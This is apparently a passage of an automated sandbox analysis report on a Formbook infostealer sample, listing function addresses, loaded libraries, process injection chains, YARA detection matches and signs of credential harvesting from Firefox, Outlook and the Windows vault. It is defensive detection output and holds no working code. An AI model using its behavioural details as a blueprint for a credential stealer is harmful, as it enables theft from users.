Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046F4F40 5_2_046F4F40
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04722F30 5_2_04722F30
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046C2F28 5_2_046C2F28
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046A0F30 5_2_046A0F30
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0468CFE0 5_2_0468CFE0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04672FC8 5_2_04672FC8
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046FEFA0 5_2_046FEFA0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0468A840 5_2_0468A840
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04682840 5_2_04682840
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046AE8F0 5_2_046AE8F0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046668B8 5_2_046668B8
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04696962 5_2_04696962
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046829A0 5_2_046829A0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0474A9A6 5_2_0474A9A6
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0467EA80 5_2_0467EA80
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0473AB40 5_2_0473AB40
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04736BD7 5_2_04736BD7
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04671460 5_2_04671460
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0473F43F 5_2_0473F43F
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04737571 5_2_04737571
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_047495C3 5_2_047495C3
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0471D5B0 5_2_0471D5B0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046C5630 5_2_046C5630
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_047316CC 5_2_047316CC
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0473F7B0 5_2_0473F7B0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0473F0E0 5_2_0473F0E0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_047370E9 5_2_047370E9
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046870C0 5_2_046870C0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0472F0CC 5_2_0472F0CC
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046B516C 5_2_046B516C
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0466F172 5_2_0466F172
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0474B16B 5_2_0474B16B
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0468B1B0 5_2_0468B1B0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_047212ED 5_2_047212ED
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0469B2C0 5_2_0469B2C0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046852A0 5_2_046852A0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0466D34C 5_2_0466D34C
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0473132D 5_2_0473132D
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046C739A 5_2_046C739A
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046F9C32 5_2_046F9C32
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0473FCF2 5_2_0473FCF2
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04737D73 5_2_04737D73
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04683D40 5_2_04683D40
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04731D5A 5_2_04731D5A
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0469FDC0 5_2_0469FDC0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04689EB0 5_2_04689EB0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0473FF09 5_2_0473FF09
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04643FD5 5_2_04643FD5
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04643FD2 5_2_04643FD2
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0473FFB1 5_2_0473FFB1
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04681F92 5_2_04681F92
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046ED800 5_2_046ED800
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046838E0 5_2_046838E0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04689950 5_2_04689950
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0469B950 5_2_0469B950
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04715910 5_2_04715910
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046F3A6C 5_2_046F3A6C
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04737A46 5_2_04737A46
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0473FA49 5_2_0473FA49
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0472DAC6 5_2_0472DAC6
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046C5AA0 5_2_046C5AA0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_04721AA3 5_2_04721AA3
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0471DAAC 5_2_0471DAAC
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0473FB76 5_2_0473FB76
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046BDBF9 5_2_046BDBF9
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046F5BF0 5_2_046F5BF0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0469FB80 5_2_0469FB80
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_02551AB0 5_2_02551AB0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0254CA90 5_2_0254CA90
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0254CA88 5_2_0254CA88
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0254CCB0 5_2_0254CCB0
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0254AD30 5_2_0254AD30
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0254AD2E 5_2_0254AD2E
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_025532DB 5_2_025532DB
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_02553350 5_2_02553350
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_02555170 5_2_02555170
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0256B800 5_2_0256B800
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0452E444 5_2_0452E444
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0452E563 5_2_0452E563
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0452E8FC 5_2_0452E8FC
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0452D968 5_2_0452D968
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: String function: 00BEF9F2 appears 40 times
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: String function: 00BF0A30 appears 46 times
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: String function: 00BD9CB3 appears 31 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 05487E54 appears 111 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 054AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 0542B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 054BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 05475130 appears 58 times
Source: C:\Windows\SysWOW64\sdchange.exe Code function: String function: 046B5130 appears 58 times
Source: C:\Windows\SysWOW64\sdchange.exe Code function: String function: 046EEA12 appears 86 times
Source: C:\Windows\SysWOW64\sdchange.exe Code function: String function: 0466B970 appears 280 times
Source: C:\Windows\SysWOW64\sdchange.exe Code function: String function: 046FF290 appears 105 times
Source: C:\Windows\SysWOW64\sdchange.exe Code function: String function: 046C7E54 appears 111 times
Source: Enquiry24-789.exe, 00000000.00000003.2039230118.000000000430D000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Enquiry24-789.exe
Source: Enquiry24-789.exe, 00000000.00000003.2039948835.0000000004163000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Enquiry24-789.exe
Source: Enquiry24-789.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.3274136665.0000000004420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.3274079097.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.3272504977.0000000002540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.3273598788.00000000010D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2482519007.0000000005750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2481598921.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2481123443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.3274021338.00000000025C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/5@4/4
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C437B5 GetLastError,FormatMessageW, 0_2_00C437B5
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C310BF AdjustTokenPrivileges,CloseHandle, 0_2_00C310BF
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C316C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 0_2_00C316C3
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C451CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 0_2_00C451CD
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C5A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 0_2_00C5A67C
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C4648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize, 0_2_00C4648E
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00BD42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 0_2_00BD42A2
Source: C:\Users\user\Desktop\Enquiry24-789.exe File created: C:\Users\user\AppData\Local\Temp\autE733.tmp
Source: Enquiry24-789.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\Enquiry24-789.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: sdchange.exe, 00000005.00000002.3272888173.0000000002A70000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3272888173.0000000002A40000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000005.00000003.2816972696.0000000002A40000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3272888173.0000000002A4D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Enquiry24-789.exe ReversingLabs: Detection: 44%
Source: unknown Process created: C:\Users\user\Desktop\Enquiry24-789.exe "C:\Users\user\Desktop\Enquiry24-789.exe"
Source: C:\Users\user\Desktop\Enquiry24-789.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Enquiry24-789.exe"
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe Process created: C:\Windows\SysWOW64\sdchange.exe "C:\Windows\SysWOW64\sdchange.exe"
Source: C:\Windows\SysWOW64\sdchange.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Enquiry24-789.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Enquiry24-789.exe"
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe Process created: C:\Windows\SysWOW64\sdchange.exe "C:\Windows\SysWOW64\sdchange.exe"
Source: C:\Windows\SysWOW64\sdchange.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Enquiry24-789.exe Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\Enquiry24-789.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\Enquiry24-789.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\Enquiry24-789.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\Enquiry24-789.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\Enquiry24-789.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Enquiry24-789.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Enquiry24-789.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Enquiry24-789.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Enquiry24-789.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Enquiry24-789.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Enquiry24-789.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe Section loaded: wininet.dll
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe Section loaded: mswsock.dll
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\sdchange.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\sdchange.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: Enquiry24-789.exe Static file information: File size 1323520 > 1048576
Source: Enquiry24-789.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Enquiry24-789.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Enquiry24-789.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Enquiry24-789.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Enquiry24-789.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Enquiry24-789.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Enquiry24-789.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: sdchange.pdbGCTL source: svchost.exe, 00000002.00000003.2446693880.0000000003224000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2446571573.000000000321B000.00000004.00000020.00020000.00000000.sdmp, FNvzpsCDjtsg.exe, 00000004.00000003.2581472565.00000000007CB000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: FNvzpsCDjtsg.exe, 00000004.00000002.3273453544.0000000000D2E000.00000002.00000001.01000000.00000005.sdmp, FNvzpsCDjtsg.exe, 00000008.00000002.3273224995.0000000000D2E000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdbUGP source: Enquiry24-789.exe, 00000000.00000003.2039029012.0000000004040000.00000004.00001000.00020000.00000000.sdmp, Enquiry24-789.exe, 00000000.00000003.2039230118.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2249246087.0000000005000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2481674156.000000000559E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2481674156.0000000005400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2258256121.0000000005200000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3274369263.0000000004640000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000005.00000003.2486058384.00000000042D0000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3274369263.00000000047DE000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000005.00000003.2498182919.000000000448C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Enquiry24-789.exe, 00000000.00000003.2039029012.0000000004040000.00000004.00001000.00020000.00000000.sdmp, Enquiry24-789.exe, 00000000.00000003.2039230118.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2249246087.0000000005000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2481674156.000000000559E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2481674156.0000000005400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2258256121.0000000005200000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, sdchange.exe, 00000005.00000002.3274369263.0000000004640000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000005.00000003.2486058384.00000000042D0000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3274369263.00000000047DE000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000005.00000003.2498182919.000000000448C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: sdchange.exe, 00000005.00000002.3274878431.0000000004C6C000.00000004.10000000.00040000.00000000.sdmp, sdchange.exe, 00000005.00000002.3272888173.00000000029C6000.00000004.00000020.00020000.00000000.sdmp, FNvzpsCDjtsg.exe, 00000008.00000002.3274520799.000000000315C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2954922095.000000001170C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: sdchange.exe, 00000005.00000002.3274878431.0000000004C6C000.00000004.10000000.00040000.00000000.sdmp, sdchange.exe, 00000005.00000002.3272888173.00000000029C6000.00000004.00000020.00020000.00000000.sdmp, FNvzpsCDjtsg.exe, 00000008.00000002.3274520799.000000000315C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2954922095.000000001170C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: sdchange.pdb source: svchost.exe, 00000002.00000003.2446693880.0000000003224000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2446571573.000000000321B000.00000004.00000020.00020000.00000000.sdmp, FNvzpsCDjtsg.exe, 00000004.00000003.2581472565.00000000007CB000.00000004.00000001.00020000.00000000.sdmp
Source: Enquiry24-789.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Enquiry24-789.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Enquiry24-789.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Enquiry24-789.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Enquiry24-789.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00BD42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00BD42DE
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00BF0A76 push ecx; ret 0_2_00BF0A89
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041F8C8 pushad ; iretd 2_2_0041F8C9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004480B5 push ecx; ret 2_2_004480C8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040D900 pushad ; iretd 2_2_0040D906
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040E99F push edi; retf 2_2_0040E9A3
